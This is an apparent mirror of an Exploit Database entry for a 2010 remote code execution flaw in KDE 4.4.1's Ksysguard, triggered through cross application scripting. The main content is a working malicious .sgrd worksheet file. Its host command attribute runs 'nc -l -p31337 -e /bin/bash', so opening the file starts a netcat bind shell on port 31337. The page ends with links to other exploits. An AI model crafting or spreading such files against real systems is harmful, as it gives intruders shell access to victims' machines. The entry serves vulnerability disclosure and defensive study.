KDE 4.4.1 – Ksysguard Remote Code Execution (via Cross Application Scripting)

Exploit Database
7 阅读

作者： emgent

日期： 2010-03-20
类别：
- remote
平台：
- multiple
来源：https://www.exploit-db.com/exploits/11817/

# Exploit Title: Ksysguard RCE via Cross Application Scripting
# Date: 2010 03 20
# Author: Emanuele 'emgent' Gentili
# Code: http://www.backtrack.it/~emgent/exploits/20100320_Ksysguard_RCE_CAS.txt
# Version: <= 4.4.1
# CVE : N/A
# Vendor: http://www.kde.org
# Video: http://www.backtrack.it/~emgent/videos/16032010_-_SecuritySummit_CAS_OWNING_KDE.mov
# About CAS: http://en.wikipedia.org/wiki/Cross_Application_Scripting 
#http://it.wikipedia.org/wiki/Cross_Application_Scripting



halfapple:~ emanuelegentili$ cat ph33r.sgrd
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE KSysGuardWorkSheet>
<WorkSheet title="She" interval="2" locked="0" rows="2" columns="2" >
<host command="nc -l -p31337 -e /bin/bash" /> </WorkSheet>
halfapple:~ emanuelegentili$

last Exploits
KDE 4.4.1 – Ksysguard Remote Code Execution (via Cross Application Scripting)的更多信息

SonicWALL – ‘SessId’ Cookie Brute Force / Admin Session Hijacking：
Deepin TFTP Server 1.25 – Directory Traversal：
Moxa MX AOPC-Server 1.5 – XML External Entity Injection：
Atlassian Confluence Widget Connector Macro – Velocity Template Injection (Metasploit)：
Apple Safari 6.0.1 for iOS 6.0 / Apple Mac OSX 10.7/8 – Heap Buffer Overflow：
Microsoft Internet Explorer – DHTML Behaviour Use-After-Free (MS10-018) (Metasploit)：
Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal：
Freefloat FTP Server – Directory Traversal：